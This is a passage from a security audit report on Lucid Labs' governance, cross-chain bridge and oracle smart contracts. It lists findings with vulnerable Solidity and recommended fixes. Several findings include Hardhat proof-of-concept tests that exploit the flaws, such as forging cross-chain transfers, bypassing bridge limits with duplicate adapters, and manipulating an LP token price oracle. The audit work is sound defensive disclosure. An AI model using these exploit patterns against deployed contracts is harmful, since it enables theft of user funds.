Prepared by:
HALBORN
Last Updated 12/12/2024
Date of Engagement by: October 7th, 2024 - November 8th, 2024
100% of all REPORTED Findings have been addressed
All findings
28
Critical
3
High
3
Medium
6
Low
5
Informational
11
Lucid Labs
engaged Halborn to conduct a security assessment on their smart contracts revisions beginning on October 7th, 2024 and ending on November 8th, 2024. The security assessment was scoped to the smart contracts provided to the Halborn
team.
Commit hashes and further details can be found in the Scope section of this report.
The team at Halborn was provided 5 weeks for the engagement and assigned a full-time security engineer to evaluate the security of the smart contract.
The security engineer is a blockchain and smart-contract security expert with advanced penetration testing, smart-contract hacking, and deep knowledge of multiple blockchain protocols.
The purpose of this assessment is to:
Ensure that smart contract functions operate as intended.
Identify potential security issues with the smart contracts.
In summary, Halborn identified some improvements to reduce the likelihood and impact of risks, which were partially addressed by the Lucid Labs team
. The main ones were the following:
Implement a working mechanism about quadratic implementation and governor strategy.
Add access controls for asset controller.
Remove the division by zero probability.
Implement a check in burnAndBridgeMulti to ensure all provided adapter addresses are unique.
Create another FlexVotingClient to apply quadratic transformation to individual votes before aggregation.
Implement Alpha Finance's formula for pricing LP tokens.
Halborn performed a combination of manual and automated security testing to balance efficiency, timeliness, practicality, and accuracy regarding the scope of this assessment. While manual testing is recommended to uncover flaws in logic, process, and implementation; automated testing techniques help enhance code coverage and quickly identify items that do not follow the security best practices. The following phases and associated tools were used during the assessment:
Research into architecture and purpose.
Smart contract manual code review and walkthrough.
Graphing out functionality and contract logic/connectivity/functions. (solgraph,draw.io
)
Manual assessment of use and safety for the critical Solidity variables and functions in scope to identify any arithmetic related vulnerability classes.
Manual testing by custom scripts.
Static Analysis of security for scoped contract, and imported functions. (Slither
)
Testnet deployment. ( Hardhat
,Foundry
)
EXPLOITABILIY METRIC () | METRIC VALUE | NUMERICAL VALUE |
---|---|---|
Attack Origin (AO) | Arbitrary (AO:A) Specific (AO:S) | 1 0.2 |
Attack Cost (AC) | Low (AC:L) Medium (AC:M) High (AC:H) | 1 0.67 0.33 |
Attack Complexity (AX) | Low (AX:L) Medium (AX:M) High (AX:H) | 1 0.67 0.33 |
IMPACT METRIC () | METRIC VALUE | NUMERICAL VALUE |
---|---|---|
Confidentiality (C) | None (I:N) Low (I:L) Medium (I:M) High (I:H) Critical (I:C) | 0 0.25 0.5 0.75 1 |
Integrity (I) | None (I:N) Low (I:L) Medium (I:M) High (I:H) Critical (I:C) | 0 0.25 0.5 0.75 1 |
Availability (A) | None (A:N) Low (A:L) Medium (A:M) High (A:H) Critical (A:C) | 0 0.25 0.5 0.75 1 |
Deposit (D) | None (D:N) Low (D:L) Medium (D:M) High (D:H) Critical (D:C) | 0 0.25 0.5 0.75 1 |
Yield (Y) | None (Y:N) Low (Y:L) Medium (Y:M) High (Y:H) Critical (Y:C) | 0 0.25 0.5 0.75 1 |
SEVERITY COEFFICIENT () | COEFFICIENT VALUE | NUMERICAL VALUE |
---|---|---|
Reversibility () | None (R:N) Partial (R:P) Full (R:F) | 1 0.5 0.25 |
Scope () | Changed (S:C) Unchanged (S:U) | 1.25 1 |
Severity | Score Value Range |
---|---|
Critical | 9 - 10 |
High | 7 - 8.9 |
Medium | 4.5 - 6.9 |
Low | 2 - 4.4 |
Informational | 0 - 1.9 |
Critical
3
High
3
Medium
6
Low
5
Informational
11
Security analysis | Risk level | Remediation Date |
---|---|---|
Quadratic Voting Strategy Incompatible with Quorum Calculation in LucidGovernor | Critical | Solved - 12/03/2024 |
Lack of Access Control in receiveMessage in AssetController Contract | Critical | Solved - 10/23/2024 |
Division by Zero in Quadratic Vote Weight Calculation | Critical | Solved - 11/29/2024 |
Bypass of Bridge Limits in burnAndBridgeMulti Function | High | Solved - 10/23/2024 |
Mathematical Incompatibility Between FlexVotingClient and QuadraticVoteStrategy | High | Solved - 12/05/2024 |
LP Token Price Manipulation Through Reserve | High | Solved - 12/06/2024 |
Front-Running Vulnerability in Two-Step Deployment and Configuration Process | Medium | Solved - 11/05/2024 |
Unhandled Exceptions in CCIP Message Processing Can Lead to Cross-Chain Communication Failure | Medium | Risk Accepted - 11/10/2024 |
UniswapV3 Oracle Vulnerability on L2 Networks Due to Sequencer Downtime | Medium | Solved - 10/29/2024 |
Excess Fees Retention in AssetController | Medium | Solved - 10/23/2024 |
Missing Sequencer Uptime Check in BondChainlinkOracle for L2 Deployments | Medium | Solved - 10/24/2024 |
Uninitialized EIP712 Functionality in VotingControllerUpgradeable __EIP712_init | Medium | Solved - 10/30/2024 |
Incorrect Gas Refund Calculation Due To EIP-150 Rule In Voting Functions | Low | Solved - 12/05/2024 |
Improper Initialization of Timelock Delay in receiveMessage Function | Low | Solved - 11/21/2024 |
Unsafe EIP712 Message Hashing in Cross-Chain Voting Mechanism | Low | Solved - 11/21/2024 |
CREATE3 Factory Is Not Compatible With ZKSYNC Era | Low | Risk Accepted - 11/24/2024 |
Failed ETH Transfers Not Handled in RefundGas Function | Low | Solved - 10/30/2024 |
Useless Token Execution Functions Present in AxelarExecutable Contract | Informational | Solved - 11/20/2024 |
Unlocked Pragma Compiler | Informational | Solved - 11/22/2024 |
Useless Interface Import in WormholeAdapter Contract | Informational | Solved - 11/20/2024 |
Suboptimal Memory Usage in BondChainlinkOracle._getTwoFeedPrice Function | Informational | Solved - 12/05/2024 |
Missing Zero Amount Check in Cross-Chain Bridge Functions | Informational | Solved - 11/20/2024 |
Inconsistent Amount Handling After Fee Deduction in Multi-Bridge Transfer | Informational | Solved - 11/21/2024 |
Inefficient Storage Access Pattern in Message Reception Handling | Informational | Solved - 11/21/2024 |
Missing Duration Validation Enables Zero Division in Base Asset Bridge | Informational | Solved - 11/21/2024 |
Insufficient Delegation Control in Connext Cross-Chain Transfers | Informational | Solved - 11/22/2024 |
Gas Inefficient Role Check Implementation | Informational | Solved - 11/21/2024 |
Owner Can Renounce Ownership | Informational | Acknowledged - 11/20/2024 |
// Critical
The LucidGovernor
and LucidGovernorTimelock
contracts are designed to work with different voting strategies, including QuadraticVoteStrategy
and QuadraticGitcoinPassportStrategy
. However, these quadratic voting strategies are incompatible with the current quorum calculation method.
The quorum is calculated in the GovernorVotesQuorumFractionUpgradeable
contract, which is inherited by LucidGovernor
:
function quorum(uint256 timepoint) public view virtual override returns (uint256) {
return (token.getPastTotalSupply(timepoint) * quorumNumerator(timepoint)) / quorumDenominator();
}
This calculation uses the total token supply, which does not account for the quadratic nature of the voting power. As a result, it is impossible to reach the quorum when using quadratic voting strategies, even if all token holders vote with their full voting power.
For example :
Total Supply: 1,000,000 tokens
Quorum: 50% = 500,000 tokens
Using quadratic voting with no threshold:
Maximum voting power = √1,000,000 = 1,000
Even with 100% participation, maximum voting power (1,000) < quorum (500,000)
This means that even if all token holders vote, the total voting power will always be less than the required quorum, making it impossible to pass any proposal.
The incompatibility between the quadratic voting strategies and the quorum calculation renders the governance system non-functional when using these strategies. No proposals can pass, effectively breaking the entire governance mechanism and preventing any decision-making through the LucidGovernor
contract.
This test can be found in HalbornLucidGovernor.test.ts
:
describe("Halborn_QuadraticPOC", () => {
beforeEach(async () => {
await helpers.time.increase(50);
// Make a new proposal
let propId = await governor.propose([ethers.constants.AddressZero], [0], [0x0], "Test Proposal");
// Get proposal id of created proposal
proposalId = (
await governor.hashProposal(
[ethers.constants.AddressZero],
[0],
[0x0],
"0xeac4b25d9db71364cb2a2812dbc47eed8e23f9ffc223b07b7ed2dcef7d02d9bc"
)
).toString();
await helpers.time.increase(50);
// Get proposal snapshot, it is needed to relay the vote
proposalSnapshot = await governor.proposalSnapshot(proposalId);
});
it("[!][-][!] Cannot pass quorum even if all voters voted with all power", async () => {
await governor.connect(user1Signer).castVote(proposalId,1);
await governor.connect(user2Signer).castVote(proposalId,1);
await governor.connect(user3Signer).castVote(proposalId,1);
await governor.connect(ownerSigner).castVote(proposalId,1);
const proposalVotes = await governor.proposalVotes(proposalId);
console.log("[Set-Up]\n\tTotalSupply = 40e18\n\tUser1,User2,User3,Owner have 10e18 tokens\n\t\t=> They all vote for proposalId with their 10e18 votes\n")
console.log("[End Of Set-up]\n");
// array includes against, for, abstain
console.log("Number of votes for proposal = %s",proposalVotes[1]);
let latest = await helpers.time.latest();
console.log("token.getPastTotalSupply(timepoint) = %s",await nativeToken.getPastTotalSupply(latest-1));
const quorumToReach = await governor.quorum(latest-1);
console.log("Quorum To Reach = %s",quorumToReach);
await helpers.time.increase(86400);
console.log("State of proposal after deadline = %s",await governor.state(proposalId));
console.log(" 3 = Defeated");
});
});
Result :
To address this issue, it is recommended to implement a custom quorum
calculation method that is compatible with quadratic voting strategies. This can be achieved by overriding the quorum function in the LucidGovernor/Timelock
contract to use a quadratic calculation in case this strategy is used.
One idea could be to add a boolean isStrategyQuadratic
variable and use the quorumQuadratic
function with an if
statement to compute the quorum to be reached regarding the strategy.
SOLVED: The Lucid Labs team implemented 2 strategies deployments paths with 2 quorums computation paths, which solved the issue.
// Critical
The AssetController.sol
contract contains a critical vulnerability in its receiveMessage
function. This function lacks proper sender validation, allowing any external actor to call it directly when transfer.threshold != 1
. The vulnerable code is located in the receiveMessage function:
function receiveMessage(bytes calldata receivedMsg, uint256 originChain, address originSender) public override nonReentrant {
// Origin sender must be a controller on another chain
if (getControllerForChain(originChain) != originSender) revert Controller_Invalid_Params();
// Decode message
Transfer memory transfer = abi.decode(receivedMsg, (Transfer));
ReceivedTransfer storage receivedTransfer = receivedTransfers[transfer.transferId];
if (transfer.threshold == 1) {
// This part is OK because if msg.sender is arbitrary there is no limit
_useMinterLimits(msg.sender, transfer.amount);
} else {
// Here the check about msg.sender is not made and not limit is decreased
ReceivedTransfer storage receivedTransfer = receivedTransfers[transfer.transferId];
// Multi-bridge transfer
if (receivedTransfer.receivedSoFar == 0) {
receivedTransfer.recipient = transfer.recipient;
receivedTransfer.amount = transfer.amount;
receivedTransfer.unwrap = transfer.unwrap;
receivedTransfer.receivedSoFar = 1;
receivedTransfer.threshold = transfer.threshold;
receivedTransfer.originChainId = originChain;
receivedTransfer.executed = false;
} else {
receivedTransfer.receivedSoFar++;
}
// Check if the transfer can be executed
if (receivedTransfer.receivedSoFar >= receivedTransfer.threshold) {
emit TransferExecutable(transfer.transferId);
}
}
}
The function fails to verify the caller's identity (msg.sender
) in a Multi-bridge transfer process, allowing any address to invoke it, send the same TX enough time to pass the threshold
and create or modify transfer records when only allowed adapters should be able to call this part.
The exploit allows bypassing of intended authorization checks and leads to unauthorized token minting, theft of funds, or disruption of the entire cross-chain transfer system.
This test can be added to AssetControler.test.ts :
describe("Halborn_burnAndBridge", () => {
let attackerSigner: SignerWithAddress;
beforeEach(async () => {
[attackerSigner] = await ethers.getSigners();
// await helpers.time.increase(2000);
relayerFee = ethers.utils.parseEther("0.001");
amountToBridge = ethers.utils.parseEther("4000");
// Approval needs to be given because controller will burn the tokens
await sourceToken.connect(ownerSigner).approve(sourceController.address, amountToBridge);
});
it("Attacker can directly call receiveMessage and create a fake transfer", async () => {
const fakeTransferId = ethers.utils.keccak256(ethers.utils.toUtf8Bytes("fake_transfer"));
const fakeAmount = ethers.utils.parseEther("1000");
const fakeOriginChain = 100; // A chain ID that doesn't exist in our setup
const fakeOriginSender = sourceController.address;
/**
struct Transfer {
address recipient;
uint256 amount;
bool unwrap;
uint256 threshold;
bytes32 transferId;
}
*/
// Create a fake transfer message
const fakeTransfer = {
recipient: attackerSigner.address,
amount: fakeAmount,
unwrap: false,
threshold: 2,// Set to 1 to make it immediately executable
transferId: fakeTransferId
};
// Encode the fake transfer
const encodedTransfer = ethers.utils.defaultAbiCoder.encode(
["tuple(address recipient, uint256 amount, bool unwrap, uint256 threshold, bytes32 transferId)"],
[fakeTransfer]
);
// Call receiveMessage directly from the attacker
await sourceController.connect(attackerSigner).receiveMessage(
encodedTransfer,
fakeOriginChain,
fakeOriginSender
);
await sourceController.connect(attackerSigner).receiveMessage(
encodedTransfer,
fakeOriginChain,
fakeOriginSender
);
// Check if the transfer was created and is executable
const transferDetails = await sourceController.receivedTransfers(fakeTransferId);
expect(transferDetails.recipient).to.equal(attackerSigner.address);
expect(transferDetails.amount).to.equal(fakeAmount);
expect(transferDetails.receivedSoFar).to.equal(2);
expect(transferDetails.threshold).to.equal(2);
expect(transferDetails.originChainId).to.equal(fakeOriginChain);
expect(transferDetails.executed).to.be.false;
// Verify that the TransferExecutable event was emitted
await expect(sourceController.connect(attackerSigner).receiveMessage(
encodedTransfer,
fakeOriginChain,
fakeOriginSender
)).to.emit(sourceController, "TransferExecutable").withArgs(fakeTransferId);
await sourceController.connect(attackerSigner).execute(fakeTransferId);
});
});
Result :
To address this vulnerability, implement strict sender validation at the beginning of the receiveMessage
function in AssetController.sol as it is done in other controllers :
function receiveMessage(bytes calldata receivedMsg, uint256 originChain, address originSender) public override nonReentrant {
if (!isSenderApproved(msg.sender)) revert Controller_Unauthorised();
// Existing function logic...
}
It is also recommended to ensure receivedTransfer.threshold > 0
.
SOLVED: The Lucid Labs team implemented a msg.sender
check.
// Critical
The QuadraticGitcoinPassportStrategy
contract contains a critical division by zero vulnerability in its vote weight calculation logic. The issue occurs in the proportional match rate calculation for Gitcoin Passport scores:
function _applyScore(address account, uint256 votes) internal view returns (uint256 total) {
uint256 score = _getPassportScore(account);
if (score < scoreAmplifiers[0]) {
// ... //
} else if (score < scoreAmplifiers[1]) {
// Proportional match between user-defined scoreRanges[1] and scoreRanges[2] for scores between scoreAmplifiers[0] and scoreAmplifiers[1]
uint256 matchRate = scoreRanges[1] +
((score - scoreAmplifiers[0]) * (scoreRanges[2] - scoreRanges[1])) /
(scoreAmplifiers[1] - scoreAmplifiers[1]); //E @AUDIT division by 0
total = votes + (votes * matchRate) / 100;
} else {
// .. //
}
return total;
}
The denominator (scoreAmplifiers[1] - scoreAmplifiers[1]
) performs subtraction of the same value from itself, resulting in zero. When this code path is executed for scores that fall between scoreAmplifiers[0]
and scoreAmplifiers[1]
, the transaction reverts due to division by zero and the voter cannot cast votes.
Impact :
The vote calculation function reverts for all Gitcoin Passport scores between scoreAmplifiers[0]
and scoreAmplifiers[1]
The voting power adjustment is non-functional for affected score ranges
Participants with scores in this range are unable to cast votes
The quadratic voting mechanism is broken for a significant portion of the scoring range
This test can be find in QuadraticGitcoinPassportPOC (IGitcoinPassportDecoder
Mocked to return a value to trigger division by 0)
describe("Halborn_QuadraticGitcoinPassportPOC", () => {
beforeEach(async () => {
await helpers.time.increase(50);
// Make a new proposal
let propId = await governor.propose([ethers.constants.AddressZero], [0], [0x0], "Test Proposal");
// Get proposal id of created proposal
proposalId = (
await governor.hashProposal([ethers.constants.AddressZero],[0],[0x0],"0xeac4b25d9db71364cb2a2812dbc47eed8e23f9ffc223b07b7ed2dcef7d02d9bc")
).toString();
await helpers.time.increase(50);
// Get proposal snapshot, it is needed to relay the vote
proposalSnapshot = await governor.proposalSnapshot(proposalId);
});
it("[!][-][!] Division By 0", async () => {
await governor.connect(user1Signer).castVote(proposalId,1);
});
});
Result :
It is recommended to replace the current implementation with the correct linear interpolation formula :
uint256 matchRate = scoreRanges[1] +
((score - scoreAmplifiers[0]) * (scoreRanges[2] - scoreRanges[1])) /
(scoreAmplifiers[1] - scoreAmplifiers[0]);
SOLVED: The Lucid Labs team modified the division by 0 and added some checks on the constructor.
// High
The AssetController
contract, in the burnAndBridgeMulti
function, allows users to bypass individual bridge limits. The function does not verify the uniqueness of the provided adapter addresses, enabling users to submit duplicate addresses and bypass the multi-bridge limit system.
function burnAndBridgeMulti(
address recipient,
uint256 amount,
bool unwrap,
uint256 destChainId,
address[] memory adapters, //E @AUDIT dupplicates not checked
uint256[] memory fees
) public payable nonReentrant whenNotPaused {
// ... [other code]
uint256 _currentLimit = burningCurrentLimitOf(address(0));
if (_currentLimit < amount) revert IXERC20_NotHighEnoughLimits();
_useBurnerLimits(address(0), amount);
// ... [other code]
_relayTransfer(transfer, destChainId, adapters, fees);
}
The function uses a separate limit check for multi-bridge transfers (burningCurrentLimitOf(address(0))
), which can be exploited to bypass individual bridge limits because there is no verification that the adapters in the adapters array passed as argument to burnAndBridgeMulti (address[] memory adapters) are unique.
This vulnerability allows users to exceed the intended limits for individual bridges. An attacker can first use the burnAndBridge
function to reach the limit of a single bridge, then use burnAndBridgeMulti
with an array containing only the same bridge address multiple times. This bypasses the individual bridge limit and utilizes the multi-bridge limit (address(0)
) for the same bridge.
This test can be found in AssetController.test.ts
:
describe("Halborn_burnAndBridge", () => {
beforeEach(async () => {
// await helpers.time.increase(2000);
relayerFee = ethers.utils.parseEther("0.001");
amountToBridge = ethers.utils.parseEther("4000");
// Approval needs to be given because controller will burn the tokens
await sourceToken.connect(ownerSigner).approve(sourceController.address, amountToBridge);
});
/*it("Burn and bridge with address(0) as adapter", async () => {
//await sourceController.setLimits(ethers.constants.AddressZero, ethers.utils.parseEther("1000"), ethers.utils.parseEther("1000"));
//await destController.setLimits(ethers.constants.AddressZero, ethers.utils.parseEther("1000"), ethers.utils.parseEther("1000"));
//const tx = await sourceController.burnAndBridge(user1Signer.address, amountToBridge, false, 100, ethers.constants.AddressZero, {
// value: relayerFee,
//});
await expect(sourceController.burnAndBridge(user1Signer.address, amountToBridge, false, 100, ethers.constants.AddressZero, {
value: relayerFee,
})).to.be.reverted;
});*/
it("Bypass Limits by sending same adapters in array", async () => {
// await sourceController.setLimits(ethers.constants.AddressZero, ethers.utils.parseEther("1000"), ethers.utils.parseEther("1000"));
// await destController.setLimits(ethers.constants.AddressZero, ethers.utils.parseEther("1000"), ethers.utils.parseEther("1000"));
// await sourceController.setLimits(sourceBridgeAdapter.address, ethers.utils.parseEther("1000"), ethers.utils.parseEther("1000"));
// await destController.setLimits(destBridgeAdapter.address, ethers.utils.parseEther("1000"), ethers.utils.parseEther("1000"));
// can go until 2000 for one bridge
console.log("[-] burnAndBridge is used until sourceBridgeAdapter => 1000");
const tx = await sourceController.burnAndBridge(user1Signer.address,ethers.utils.parseEther("1000"), false, 100, sourceBridgeAdapter.address, {
value: relayerFee,
});
await expect(tx).to.emit(sourceController, "TransferCreated");
// Bypass Limits => Revert
await expect(sourceController.burnAndBridge(user1Signer.address,ethers.utils.parseEther("1"), false, 100, sourceBridgeAdapter.address, {
value: relayerFee,
})).to.be.revertedWithCustomError(sourceController, "IXERC20_NotHighEnoughLimits");
// Use burnAndBridgeMulti with same adapter
console.log("[-] burnAndBridgeMulti is used to bypass limit of sourceBridgeAdapter => 2000");
const tx2 = await sourceController.burnAndBridgeMulti(
user1Signer.address,
ethers.utils.parseEther("1000"),
false,
100,
[sourceBridgeAdapter.address, sourceBridgeAdapter.address],
[relayerFee, relayerFee],
{
value: relayerFee.mul(2),
}
);
await expect(tx2).to.emit(sourceController, "TransferCreated");
await expect(sourceController.burnAndBridgeMulti(
user1Signer.address,
ethers.utils.parseEther("6"), //E fees not burned so 1 would not revert
false,
100,
[sourceBridgeAdapter.address, sourceBridgeAdapter.address],
[relayerFee, relayerFee],
{
value: relayerFee.mul(2),
}
)).to.be.revertedWithCustomError(sourceController, "IXERC20_NotHighEnoughLimits");
console.log("[OK] Bypass worked");
});
});
Result : 2X the limit of a single Bridge can be used
It is recommended to implement a check in burnAndBridgeMulti
to ensure all provided adapter addresses are unique :
function checkUniqueness(address[] memory adapters) internal pure returns (bool) {
uint256 length = adapters.length;
for (uint256 i = 0; i < length - 1; i++) {
for (uint256 j = i + 1; j < length; j++) {
if (adapters[i] == adapters[j]) {
return false;
}
}
}
return true;
}
SOLVED: A new function checkUniqueness()
has been added to check for adapters uniqueness.
// High
An incompatibility has been discovered when FlexVotingClient contract is used with a quadratic Strategy for votes because FlexVotingClient
contract computes voting weights linearly while the totalWeight
limit for vote casting is transformed quadratically, creating a fundamental mathematical conflict that leads to transaction reverts.
The conflict occurs between these two computations:
uint128 _forVotesToCast = SafeCast.toUint128(
(_votingWeightAtSnapshot * _proposalVote.forVotes) / _totalRawBalanceAtSnapshot
);
// getVotes() :
_applyStrategy(account, token.getPastVotes(account, timepoint))
// _applyStrategy() :
uint256 weightSqrt = Math.sqrt((weight - quadraticThreshold) / 10 ** thresholdDecimals);
totalWeight = weightSqrt * 10 ** thresholdDecimals + quadraticThreshold;
And the system enforces this check in GovernorCrossCountingFractional.sol:
if (_newWeight > totalWeight) {
revert GovernorCrossCountingFractionalUpgradeable_VoteWeightWouldExceedWeight();
}
The problem is that vote casted (represented by _newWeight
) from FlexVotingClient to Governor are not squared while total power of FlexVotingClient (represented by token.getPastVotes(FlexVotingClient.sol, timepoint)
) is squared when strategy is applied so 2 critical scenarios are possibles here :
Early users can express their votes until the weight of casted votes from FlexVotingClient to Governor are superior to sqrt(token.getPastVotes(FlexVotingClient.sol, timepoint))
and then "late" users can no longer express their votes
First user expressing votes has more vote power than sqrt(token.getPastVotes(FlexVotingClient.sol, timepoint))
and FlexVotingClient is DOSed from casting votes for the proposal
Simple Example explaining scenario 2 , given :
Raw Balance = 10,000 tokens
Number of Voters = 90
Individual Vote = 111 tokens
Results in:
totalWeight = sqrt(10,000) = 100
Linear vote calculation of a user votes : 111
Check fails: 111 > 100 => DOSed
The system is completely non-functional. All vote casting transactions from FlexVotingClient
will revert due to exceeding the quadratically reduced totalWeight
limit. This breaks the core voting functionality of the protocol.
This test can be find in TokenFlexVotingQuadratic.test.ts :
it("Should cast the vote with Quadratic Strategy", async () => {
await vesting.connect(user1Signer).expressVote(governor.address, proposalId, 0);
await helpers.time.increase(1);
await vesting.castVote(governor.address, proposalId);
expect(await governor.hasVoted(proposalId, vesting.address)).to.equal(true);
const votes = await governor.proposalVotes(proposalId);
expect(votes[0]).to.equal(ethers.utils.parseEther("250"));
});
Result :
It is recommended to create another FlexVotingClient
to apply quadratic transformation to individual votes before aggregation:
mapping(address => uint256) private quadraticBalances;
function _updateQuadraticBalance(address user) internal {
uint256 rawBalance = _rawBalanceOf(user);
quadraticBalances[user] = sqrt(rawBalance);
}
function _getVotesToCast(uint256 rawVotes, uint256 totalRawBalance) internal pure returns (uint256) {
uint256 individualWeight = sqrt(rawVotes);
return (individualWeight * totalWeight) / sqrt(totalRawBalance);
}
Another options would be to modify castVoteWithReasonAndParams()
when a quadratic strategy is used in the governor.
SOLVED: The Lucid Labs team decided to never deploy a FlexVotingClient with a quadratic strategy, a note has been added to the FlexVotingClient contract.
// High
The BondSteerOracle contract implements a flawed methodology for calculating the price of Steer Protocol LP tokens. The _currentPrice
function uses spot reserves to determine the LP token value, which is susceptible to manipulation:
function _currentPrice(ERC20 quoteToken_, ERC20 payoutToken_) internal view override returns (uint256) {
SteerParams memory params = priceFeedParams[quoteToken_][payoutToken_];
(uint256 reserve0, uint256 reserve1) = params.steerVault.getTotalAmounts();
uint256 totalSupply = params.steerVault.totalSupply();
uint256 lpPrice;
if (params.priceInToken0) {
lpPrice = (reserve0 * 2 * PRECISION) / (totalSupply * (10 ** params.token0Decimals));
} else {
lpPrice = (reserve1 * 2 * PRECISION) / (totalSupply * (10 ** params.token1Decimals));
}
return PRECISION / lpPrice;
}
This implementation is vulnerable because:
It relies on spot reserves (getTotalAmounts()
), which are easily manipulable through large trades or flash loans.
The calculation does not account for potential imbalances in the pool or market conditions.
There are no safeguards against extreme price movements or manipulation attempts.
This test can be found in BondFixedTermSteerOFDA.test.ts (with a modified MockSteerPool) :
it("should demonstrate price manipulation through reserve changes", async () => {
// Configure oracle
const encodedSteerConfig = ethers.utils.defaultAbiCoder.encode(
["tuple(address, bool)"],
[[steerToken.address, false]]
);
await oracle.setPair(steerToken.address, payoutToken.address, true, encodedSteerConfig);
// Get initial LP token price
const initialPrice = await oracle["currentPrice(address,address)"](steerToken.address, payoutToken.address);
console.log("Initial LP token price:", initialPrice.toString());
// Attacker manipulates reserves by adding large amount of liquidity with imbalanced reserves
// This creates a price discrepancy
await steerToken.setToken0Amount(ethers.utils.parseEther("10000")); // Large amount of token0
await steerToken.setToken1Amount(ethers.utils.parseEther("100")); // Keep token1 small
await steerToken._setTotalSupply(ethers.utils.parseEther("1000")); // Increase total supply proportionally
// Get manipulated price
const manipulatedPrice = await oracle["currentPrice(address,address)"](steerToken.address, payoutToken.address);
console.log("Manipulated LP token price:", manipulatedPrice.toString());
// Create bond market with manipulated price
const encodedParams = ethers.utils.defaultAbiCoder.encode(
["tuple(address, address, address, address, uint48, uint48, bool, uint256, uint48, uint48, uint48, uint48)"],
[
[
payoutToken.address,
steerToken.address,
ethers.constants.AddressZero,
oracle.address,
"20000", // baseDiscount
"50000", // maxDiscountFromCurrent
false, // capacityInQuote
ethers.utils.parseEther("10000"), // capacity
"360000", // depositInterval
vestingLength,
"0", // start
bondDuration,
]
]
);
await auctioner.createMarket(encodedParams);
const bondMarketPrice = await auctioner.marketPrice(0);
console.log("Bond market price:", bondMarketPrice.toString());
// Verify manipulation occurred
expect(manipulatedPrice).to.be.gt(initialPrice);
// Attacker can now remove the extra liquidity
await steerToken.setToken0Amount(ethers.utils.parseEther("100"));
await steerToken.setToken1Amount(ethers.utils.parseEther("100"));
await steerToken._setTotalSupply(ethers.utils.parseEther("100"));
const finalPrice = await oracle["currentPrice(address,address)"](steerToken.address, payoutToken.address);
console.log("Final LP token price:", finalPrice.toString());
// Price should have been manipulated up and then back down
expect(finalPrice).to.be.lt(manipulatedPrice);
// Calculate manipulation percentage
const manipulationPercent = manipulatedPrice.sub(initialPrice).mul(100).div(initialPrice);
console.log("Price manipulation percentage:", manipulationPercent.toString(), "%");
});
Here is the result :
It is recommended to implement Alpha Finance's formula for pricing LP tokens:
2 sqrt(p0 p1) * sqrt(k) / L
Where:
p0
and p1
are time-weighted average prices (TWAPs) of the underlying assets
k
is the constant product invariant (k = r0 * r1
)
L
is the total supply of LP tokens
This approach calculates the LP token price based on TWAPs and the invariant k, rather than using manipulable spot reserves. It provides resistance against flash loan attacks and other forms of price manipulation.
Ref to CMichel Article
SOLVED: The Lucid Labs team implemented a lot of changes, including the recommended solution and an oracle implementation for the tokens prices of the LP Vault.
// Medium
The current implementation of the AccessConfigurator
, RefundGasUpgradeable
, and TimelockUpgradeable
contracts introduces a front-running vulnerability due to the separation of deployment and configuration into two distinct transactions.
The process occurs as follows:
function configureTimelock(IAccessControl timelock, address governor, address canceller) external {
_configureTimelock(timelock, governor, canceller);
}
function configureRefundGas(IRefundGas refundGas, address governor) external {
_configureRefundGas(refundGas, governor);
}
function configureTimelockRefundGas(IAccessControl timelock, IRefundGas refundGas, address governor, address canceller) external {
_configureTimelock(timelock, governor, canceller);
_configureRefundGas(refundGas, governor);
}
function _configureTimelock(IAccessControl timelock, address governor, address canceller) internal {
timelock.grantRole(PROPOSER_ROLE, governor);
timelock.grantRole(EXECUTOR_ROLE, address(0));
timelock.grantRole(CANCELLER_ROLE, canceller);
timelock.grantRole(TIMELOCK_ADMIN_ROLE, governor);
timelock.revokeRole(TIMELOCK_ADMIN_ROLE, address(this));
}
function _configureRefundGas(IRefundGas refundGas, address governor) internal {
refundGas.updateGovernor(governor);
refundGas.transferOwnership(governor);
}
Contracts are deployed:
const TimelockUpgradeable = await ethers.getContractFactory("TimelockUpgradeable");
timelock = await upgrades.deployProxy(TimelockUpgradeable, ["5000", [], [], accessConfigurator.address], {
initializer: "initialize",
});
// Similar deployment for RefundGasUpgradeable
Contracts are then configured in a separate transaction:
await accessConfigurator.configureTimelockRefundGas(timelock.address, refundGas.address, governor.address, user1Signer.address);
This two-step process creates a time window between deployment and configuration where the contracts are in an undefined and potentially vulnerable state.
An attacker monitoring the mempool will identify the deployment transaction and can front-run the configuration transaction. This allows the attacker to:
Gain unauthorized control over the Timelock contract by setting themselves as the proposer, executor, or admin.
Manipulate the RefundGas contract by setting an arbitrary governor address.
Potentially lock out the intended administrators or governors, requiring contract redeployment.
To mitigate this vulnerability, implement an atomic deployment and configuration process. This can be achieved through the following steps:
contract GovernanceSystemFactory {
function deployAndConfigureSystem(
address governor,
address user1,
// Other necessary parameters
) external returns (address timelock, address refundGas) {
// Deploy contracts
timelock = address(new TimelockUpgradeable());
refundGas = address(new RefundGasUpgradeable());
// Configure contracts
TimelockUpgradeable(timelock).initialize(5000, [], [], address(this));
RefundGasUpgradeable(refundGas).initialize(governor, 2000000000, 36000, 200000, 200000000000, address(this));
// Set up roles and permissions
TimelockUpgradeable(timelock).grantRole(TimelockUpgradeable(timelock).PROPOSER_ROLE(), governor);
TimelockUpgradeable(timelock).grantRole(TimelockUpgradeable(timelock).EXECUTOR_ROLE(), address(0));
TimelockUpgradeable(timelock).grantRole(TimelockUpgradeable(timelock).CANCELLER_ROLE(), user1);
TimelockUpgradeable(timelock).grantRole(TimelockUpgradeable(timelock).TIMELOCK_ADMIN_ROLE(), governor);
TimelockUpgradeable(timelock).revokeRole(TimelockUpgradeable(timelock).TIMELOCK_ADMIN_ROLE(), address(this));
RefundGasUpgradeable(refundGas).transferOwnership(governor);
return (timelock, refundGas);
}
}
Use this factory to deploy and configure the system in one atomic transaction.
SOLVED: This contract has been removed from the repository, solving the issue.
// Medium
The CCIPAdapter
contract in the LucidLabs protocol uses Chainlink's Cross-Chain Interoperability Protocol (CCIP) to facilitate cross-chain communication. However, the implementation fails to handle exceptions gracefully in the receiving contracts, specifically in VotingControllerUpgradeable
and AssetController
.
function _ccipReceive(Client.Any2EVMMessage memory any2EvmMessage) internal override {
_registerMessage(bytes32ToAddress(_originSender), _callData, chainId);
}
This function calls registerMessage()
on VotingControllerUpgradeable
and AssetController
, which can revert due to various reasons:
function castCrossChainVote(...) external {
//E @AUDIT can revert because of state(proposalId) , timepoint is not the good
if ((adapter != msg.sender) || (state(proposalId) != ProposalState.Active) || (proposalSnapshot(proposalId) != timepoint) || (chainTokens[chainId] != sourceToken))
revert Governor_WrongParams();
// ...
_countVote(proposalId, voter, support, votes, voteData, chainId);
// ...
}
function _countVote(
